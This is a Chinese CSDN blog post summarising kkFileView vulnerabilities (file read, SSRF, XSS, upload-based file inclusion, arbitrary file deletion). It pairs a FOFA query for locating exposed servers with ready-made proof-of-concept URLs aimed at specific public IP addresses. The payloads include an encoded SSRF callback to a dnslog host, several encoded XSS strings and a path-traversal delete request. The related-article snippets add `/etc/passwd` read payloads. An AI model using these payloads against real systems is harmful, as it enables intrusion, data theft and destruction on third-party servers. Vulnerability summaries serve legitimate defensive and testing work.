kkFileView漏洞总结

最新推荐文章于 2024-07-22 14:23:13 发布
最新推荐文章于 2024-07-22 14:23:13 发布
阅读量1.2k 收藏 4
点赞数
分类专栏: 漏洞总结
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64910183/article/details/134944424
版权
kkFileview,一个由Spring-Boot构建的文件预览项目,被发现在多个版本中存在安全问题,包括任意文件读取、SSRF、XSS以及文件上传和删除漏洞。攻击者可能利用这些漏洞读取敏感信息、执行服务器端请求伪造或篡改数据。受影响的版本包括3.6.0、4.1.0及4.0.0。
摘要由CSDN通过智能技术生成

0x00 kkFileview存在任意文件读取漏洞

漏洞描述
Keking KkFileview是中国凯京科技(Keking)公司的一个 Spring-Boot 打造文件文档在线预览项目。Keking kkFileview 存在安全漏洞,该漏洞源于存在通过目录遍历漏洞读取任意文件,可能导致相关主机上的敏感文件泄漏。
漏洞影响
kkFileview <=3.6.0
fofa查询
body="kkFile View"
漏洞证明

0x01 kkFileView SSR 漏洞

洞描述
kkFileview v4.1.0存在SSRF漏洞,攻击者可以利用此漏洞造成服务器端请求伪造(SSRF),远程攻击者可以通过将任意url注入url参数来强制应用程序发出任意请求。
漏洞影响
kkFileview =v4.1.0
洞证明
http://121.40.238.48:8012//getCorsFile?urlPath=aHR0cDovL2QyYjY0NWQ3LmRucy5kbnNtYXAub3Jn

0x03 kkFileView XSS漏洞

漏洞描述
kkFileview v4.1.0存两处XSS漏洞,可能导致网站cookies泄露。
漏洞影响
kkFileview =v4.1.0
漏洞证明
http://www.baidu.com/test.txt"><img src=111 οnerrοr=alert(1)>
编码base64:
aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg==
url编码:
aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D
poc1:
/onlinePreview?url=%3Cimg%20src=x%20οnerrοr=alert(0)%3E
http://139.9.164.127:8012/onlinePreview?url=%3Cimg%20src=x%20οnerrοr=alert(0)%3E
http://119.91.146.127:8012/picturesPreview?urls=aHR0cDovL3d3dy5iYWlkdS5jb20vdGVzdC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPg%3D%3D
<svg/οnlοad=alert(1)>编码base64:
PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+
url编码:
PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B
poc2:
http://119.91.146.127:8012/picturesPreview?urls=&currentUrl=PHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B

0x04 kkFileView任意文件上传导致xss和文件包含漏洞

漏洞描述
kkFileview全版本存在文件解析漏洞,攻击者可以利用此漏洞造成存储型 XSS、文件包含或者SSRF,远程攻击者可以通过将任意JavaSript脚本上传到服务器来持久性的利用应用程序发出攻击请求
漏洞影响
kkFileView=4.1.0
漏洞证明

1、上传文件

2、访问漏洞位置http://139.9.101.60:8012/demo/2.html

2.文件包含:

https://file.keking.cn/demo/test1.js

image

访问: https://file.keking.cn/demo/test14.html
image

0x05 kkFileView任意文件删除漏洞
漏洞描述
kkFileview v4.0.0存在任意文件删除漏洞,可能导致系统任意文件被删除
漏洞影响
kkFileview= v4.0.0
漏洞证明
/deleteFile?fileName=demo%2F..\xss.pdf
get请求此uri会删除\kkFileView-master\server\src\main\file目录中的xss.pdf(原本只能删除\kkFileView-master\server\src\main\file\demo目录下的文件)
渗透测试中心
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Chamilo 学习管理软件存在命令执行漏洞(CVE-2023-34960)
nnn2188185的博客
04-09 1045
Chamilo是一款可供用户免费下载的学习管理软件,其目的是提高来自弱势背景的用户对在线课程的可及性。Chamilo由一个名为Chamilo协会的非营利组织运行和管理。Chamilo存在命令执行漏洞,恶意攻击者可以通过构造的xml文件任意命令,进而控制服务器。
kkFileView 任意文件上传致远程代码执行漏洞复现(QVD-2024-14703)
0xSec
04-21 2063
2024年4月,互联网上披露kkFileView远程代码执行漏洞情报,攻击者可利用该漏洞上传恶意文件,获取操作系统权限。该漏洞利用简单,建议受影响的客户尽快修复漏洞
KKFileView v3.5.1文件预览服务漏洞修复
fengshi95的博客
05-23 511
KKFileView演示首页,提供了文件上传的功能,可以上传任意文件。
kkFileView-4.0.0.tar
07-21
kkFileView-4.0.0.tar
kkFileview漏洞总结
最新发布
qq_61475980的博客
07-22 1281
项目介绍Keking KkFileview是中国凯京科技(Keking)公司的一个以Spring Boot打造文件文档在线预览项目。
kkFileView getCorsFile 任意文件读取漏洞(CVE-2021-43734)
weixin_44304678的博客
11-09 1729
Keking KkFileview是中国凯京科技(Keking)公司的一个 Spring-Boot 打造文件文档在线预览项目。Keking kkFileview 存在安全漏洞,该漏洞源于存在通过目录遍历漏洞读取任意文件。
kkFileview存在任意文件读取漏洞
nnn2188185的博客
04-26 8051
Keking kkFileview 存在安全漏洞,该漏洞源于存在通过目录遍历漏洞读取任意文件,可能导致相关主机上的敏感文件泄漏。
kkFileView任意读取漏洞思考
qq_82303224_的博客
04-26 3476
urlPath=file:///etc/passwd //突破限制目录。urlPath=file:///etc/passwd直接可以读文件和。urlPath=file:///etc/passwd 成功读取到内容,urlPath=file:///etc/passwd 提示限制目录预览。.思路7:..|/..|/..|/..|/..|/..|/..|/..|etc/passwd。file:///etc/passwd 也是 500。
kkfileview预览依赖libreoffice
02-14
kkfileview与libreoffice的紧密协作》 在信息技术领域,文件预览是一项不可或缺的功能,它使得用户无需打开文件就能快速浏览文件内容,极大地提高了工作效率。kkfileview作为一个高效、便捷的文件预览工具,其...
kkfileview4.4.0依赖
11-13
总结,"kkfileview4.4.0依赖"是项目中成功实现文件预览的关键,而Aspose.CAD则为处理CAD文件提供了强大的支持。正确理解和管理这些依赖,能够提升项目效率,降低维护成本。在实际开发中,务必注意依赖的版本管理和...
kkFileview任意文件读取漏洞复现
qq_44484541的博客
11-01 1820
kkFileView为文件文档在线预览解决方案,该项目使用流行的spring boot搭建,易上手和部署,基本支持主流办公文档的在线预览,如doc,docx,xls,xlsx,ppt,pptx,pdf,txt,zip,rar,图片,视频,音频等等。Keking kkFileview 存在安全漏洞,该漏洞源于存在通过目录遍历漏洞读取任意文件,可能导致相关主机上的敏感文件泄漏。Keking KkFileview是中国凯京科技(Keking)公司的一个 Spring-Boot 打造文件文档在线预览项目。
网络安全-kkFileViews任意文件读取漏洞原理解析
weixin_39445116的博客
02-04 2752
在学习的过程中,了解到kkFileView存在任意文件读取、SSRF、文件上传漏洞。为了更深刻的理解其原理,我从git拉取了项目,由于该漏洞在最新版本已经修复,所以这只是历史版本中存在的。写这篇文章来提醒自己代码中容易出问题的地方。
kkFileView远程代码执行漏洞分析
qq_18193739的博客
04-23 1962
使用…/…/ 即可导致任意文件内容覆盖转换pdf是启动了LibreOffile 并执行 C:\Users\26927\Downloads\kkFileView-4.2.1\server\libreoffice\program\uno.py 脚本中内容导致RCE。
kkFileView日常问题统计
lxl_any的博客
05-12 1005
Error creating bean with name 'officeToPdfService' kkFileView
KkfileView关于PDF.js报错的问题以及Kkfile在网闸下预览加载不出来的问题
weixin_43869741的博客
11-27 2173
首先说关于PDF.js报错的问题上述图片就是遇到的使用KkfileView在进行图片预览是的报错问题解决:这个问题的原因是因为当时客户的谷歌浏览器版本太低了,导致里面的一些前端代码不适配,我们当时使用的是KkfileView4.3.0 而客户的谷歌浏览器版本是78,就造成了版本不兼容的问题,而在谷歌版本100以上就不会出现这个问题,建议是降低KKfileView的版本,我们降到了4.0.0就不会出现报错了,但是的把加载出来的文件转成PDF时PDF.js还是会报错,建议也降低PDF.js的版本。
glassfish任意文件读取漏洞(4.0/4.1)
3569
03-28 1907
相关厂商:glassfish漏洞编号:wooyun-2010-0144595漏洞详情:http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0...
kkFileView 填坑记录
qq187363147的专栏
04-22 4044
系统使用es,canal,kkFileView等第三方软件,一开始全部使用docker镜像部署,一开始部署很快,用着用着服务器磁盘经常开始bps读写满,定位了好久也无法处理问,无奈之下只能换回原生安装方式。 1.回主题,去kkFileView官网下载发布版本,maven打包,得到kkFileView-3.5.1.jar 2.安装openoffice环境支持,服务器使用的是阿里云centos7,执行install.sh,脚本如下 安装完openoffice后,启动 # /op...
kkFileView
07-27
kkFileView是一款用于查看各种文件格式的工具。它支持多种常见的文件类型,包括文本文件、图像文件、音频文件、视频文件等等。用户可以使用kkFileView来打开和浏览这些文件,以便查看其内容或进行简单的编辑操作。此外,kkFileView还提供了一些附加功能,例如文件搜索、批量重命名等,以方便用户管理和处理文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

渗透测试中心

各位师傅,觉得文章不错可支持下

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值